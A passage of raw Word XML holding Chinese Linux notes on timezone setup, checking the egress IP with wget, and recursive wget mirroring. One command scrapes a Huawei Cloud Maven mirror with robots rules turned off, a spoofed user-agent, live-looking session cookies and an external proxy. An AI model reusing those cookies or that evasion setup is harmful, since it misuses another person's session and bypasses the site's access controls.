        <w:t>command 2&gt;&amp;1 | another_command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B52CC89" w14:textId="77777777" w:rsidR="0078708D" w:rsidRDefault="0078708D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D57FFC2" w14:textId="0075FDF2" w:rsidR="0078708D" w:rsidRDefault="009758C3" w:rsidP="009758C3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D307F" w14:textId="77777777" w:rsidR="009758C3" w:rsidRDefault="009758C3" w:rsidP="009758C3"/>
    <w:p w14:paraId="61D282AF" w14:textId="5DA3A412" w:rsidR="009758C3" w:rsidRPr="009758C3" w:rsidRDefault="009758C3" w:rsidP="009758C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="009758C3">
        <w:t>timedatectl set-timezone Asia/Shanghai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A4EB62" w14:textId="6D54E226" w:rsidR="0078708D" w:rsidRDefault="007C3E65" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007C3E65">
        <w:t>sudo timedatectl set-24hour true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F0896D" w14:textId="77777777" w:rsidR="0078708D" w:rsidRPr="006204DE" w:rsidRDefault="0078708D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C62451E" w14:textId="658015F9" w:rsidR="00692565" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0FA4CA" w14:textId="6A25C9E6" w:rsidR="0039232C" w:rsidRDefault="0039232C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="233" w:name="_Toc159779693"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
    </w:p>
    <w:p w14:paraId="216A7B62" w14:textId="77777777" w:rsidR="0039232C" w:rsidRDefault="0039232C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACF2829" w14:textId="5EAB1096" w:rsidR="005C643D" w:rsidRDefault="005C643D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没挂</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wget ip.sb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C86B3B" w14:textId="783F4BBB" w:rsidR="0039232C" w:rsidRDefault="00E32D3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wget -q -O -  ip.sb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E370877" w14:textId="4848FD39" w:rsidR="00E32D3C" w:rsidRDefault="00572CD9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会返回当前网络你的出口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FB8BD1" w14:textId="77777777" w:rsidR="00E32D3C" w:rsidRDefault="00E32D3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16692C9D" w14:textId="6A22A2D0" w:rsidR="001A4497" w:rsidRDefault="001A4497" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快速使用你的代理访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1805A16E" w14:textId="6A627276" w:rsidR="0039232C" w:rsidRDefault="00E04314" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04314">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wget -e "http_proxy=http://127.0.0.1:6666" -q -O - ip.sb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57808286" w14:textId="77777777" w:rsidR="00E04314" w:rsidRDefault="00E04314" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2679D445" w14:textId="7F93881F" w:rsidR="0039232C" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>递归爬虫镜像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F5490" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788D635A" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63297744" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中文文档：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://linux.51yip.com/search/wget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D16A68" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EBF78B" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>鹏哥的可用的命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B844838" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD35313" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>wget -c -r -np -nc -L -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0226EBBA" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C5E4B6" w14:textId="2A2E00BC" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>wget -c -r -np -nc -l0 robots=off -A .jar https://mirrors.huaweicloud.com/repository/maven/xyz/  --user-agent="Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" -H "Cookie:devclouddevuibjJ_SESSION_ID=8a9ccf1b5d6321b871c19f3c1b4537e52ac26545b6795cc3" -H "Cookie:devclouddevuibjcftk=WR4E-S9UZ-S58U-T32V-5LBM-TO9V-3M3A-1WTJ" -H "Cookie:_fr_pvid=31b71e4cd8304b18b4b1efcee7fb7b6d" -H "Cookie:_frid=71f7d4ca36594f1ab5aba01a412679d4" -H "Cookie:_fr_ssid=bc6b3b7049024d79b632ba5d56fccf7e" -e "http_proxy=http://45.77.115.252:23307"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBD1615" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F9E5B29" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC50DA2" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F888C62" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E924175" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E89D9FF" w14:textId="35C8344D" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="234" w:name="_Toc159779694"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调整时间为北京时间</w:t>
      </w:r>
      <w:bookmarkEnd w:id="234"/>
    </w:p>
    <w:p w14:paraId="297CCDA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/zipxzf/articles/14638366.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EA341E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADE426F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>rm -rf /etc/localtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA76680" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ln -s /usr/share/zoneinfo/Asia/Shanghai /etc/localtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6A877A" w14:textId="77777777" w:rsidR="00E17172" w:rsidRDefault="00E17172" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CE636F" w14:textId="04118A8B" w:rsidR="00E17172" w:rsidRDefault="00E17172" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查时间配置：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>ocale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514082E6" w14:textId="093BF400" w:rsidR="009D3561" w:rsidRDefault="00F20F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>at /etc/default/locale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE13423" w14:textId="77777777" w:rsidR="009D3561" w:rsidRDefault="009D3561" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19EE65C1" w14:textId="4E9DC710" w:rsidR="00663901" w:rsidRDefault="00663901" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="235" w:name="_Toc159779695"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间解说</w:t>
      </w:r>
      <w:bookmarkEnd w:id="235"/>
    </w:p>
    <w:p w14:paraId="196BBC73" w14:textId="70DF1304" w:rsidR="00E17172" w:rsidRDefault="001572D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会被视为</w:t>
      </w:r>
      <w:r w:rsidRPr="001572D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中國、古巴的標準時間或美國、澳大利亞的中部時間</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，仅仅是因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是个多义词，因为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D177DCB" w14:textId="77777777" w:rsidR="001572D9" w:rsidRDefault="001572D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001572D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>中國標準時間</w:t>
      </w:r>
      <w:r w:rsidRPr="001572D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>China Standard Time UT+8:00</w:t>
      </w:r>
      <w:r w:rsidRPr="001572D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>古巴標準時間</w:t>
      </w:r>
      <w:r w:rsidRPr="001572D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Cuba Standard Time UT-4:00</w:t>
      </w:r>
      <w:r w:rsidRPr="001572D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>美國中部時間</w:t>
      </w:r>
      <w:r w:rsidRPr="001572D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Central Standard Time (USA)</w:t>
      </w:r>
      <w:r w:rsidRPr="001572D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>澳大利亞中部時間</w:t>
      </w:r>
      <w:r w:rsidRPr="001572D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Central Standard Time (Australia)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3F9871" w14:textId="3DE42154" w:rsidR="001572D9" w:rsidRDefault="001572D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的缩写都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332D64C5" w14:textId="77777777" w:rsidR="001572D9" w:rsidRDefault="001572D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="227DAAB8" w14:textId="64252690" w:rsidR="001D417F" w:rsidRDefault="001D417F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="236" w:name="_Toc159779696"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准时间</w:t>
      </w:r>
      <w:bookmarkEnd w:id="236"/>
    </w:p>
    <w:p w14:paraId="2EF1248B" w14:textId="77777777" w:rsidR="001572D9" w:rsidRDefault="001572D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF1DCB0" w14:textId="7563C97B" w:rsidR="001D417F" w:rsidRDefault="001D417F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A27E5C3" w14:textId="74BF740B" w:rsidR="001D417F" w:rsidRDefault="001D417F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66199B59" w14:textId="5C905EF4" w:rsidR="001D417F" w:rsidRDefault="001D417F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001D417F">
        <w:t>Thu, 13 Apr 2023 15:08:34 +0800</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5500E024" w14:textId="77777777" w:rsidR="001D417F" w:rsidRDefault="001D417F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D61150" w14:textId="0AC35CD5" w:rsidR="001D417F" w:rsidRDefault="001D417F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>明显是东八区的时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6758431D" w14:textId="77777777" w:rsidR="001D417F" w:rsidRDefault="001D417F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A5A225" w14:textId="77777777" w:rsidR="00913889" w:rsidRDefault="00913889" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE67583" w14:textId="620E7CB0" w:rsidR="00E05071" w:rsidRDefault="00E05071" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="237" w:name="_Toc159779697"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改时区</w:t>
      </w:r>
      <w:bookmarkEnd w:id="237"/>
    </w:p>
    <w:p w14:paraId="7DF6D305" w14:textId="7FB195B1" w:rsidR="00E05071" w:rsidRDefault="002479BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002479BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查当前是日期和时区设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0949C388" w14:textId="3220E79D" w:rsidR="00E05071" w:rsidRDefault="005D5756" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005D5756">
        <w:t>timedatectl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3175F9D6" w14:textId="77777777" w:rsidR="005D5756" w:rsidRDefault="005D5756" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23623402" w14:textId="767994F1" w:rsidR="006E2EA3" w:rsidRDefault="006E2EA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为获取时区列表，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> timedatectl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> list-timezones </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DC86B6" w14:textId="097206BF" w:rsidR="00673994" w:rsidRPr="00E05071" w:rsidRDefault="006E2EA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003A0B67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>timedatectl list-timezones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEB568D" w14:textId="77777777" w:rsidR="00913889" w:rsidRDefault="00913889" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ABC87CE" w14:textId="7FF8208D" w:rsidR="00D47B04" w:rsidRDefault="00D47B04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你也可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> grep </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出，并搜索你的时区。例如，假如你正在寻找欧洲的时区，你可以使用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB2A422" w14:textId="77777777" w:rsidR="00D47B04" w:rsidRDefault="00D47B04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>timedatectl list-timezones | grep -i europe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB53CF9" w14:textId="77777777" w:rsidR="00D47B04" w:rsidRDefault="00D47B04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26EDC4BD" w14:textId="699E7B96" w:rsidR="00D47B04" w:rsidRDefault="00D47B04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比方说，你想设置时区为巴黎。在这里，使用的时区值的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Europe/Paris </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F7BE3D" w14:textId="0AA1509E" w:rsidR="006E2EA3" w:rsidRDefault="00D47B04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003A0B67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>timedatectl set-timezone Europe/Paris</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6DB8F2" w14:textId="77777777" w:rsidR="006E2EA3" w:rsidRPr="00E05071" w:rsidRDefault="006E2EA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43BB920E" w14:textId="77777777" w:rsidR="00E05071" w:rsidRDefault="00E05071" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B36996" w14:textId="77777777" w:rsidR="00E05071" w:rsidRDefault="00E05071" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239B9E0E" w14:textId="0C0BB84E" w:rsidR="00077E19" w:rsidRDefault="00077E19" w:rsidP="009222EB">
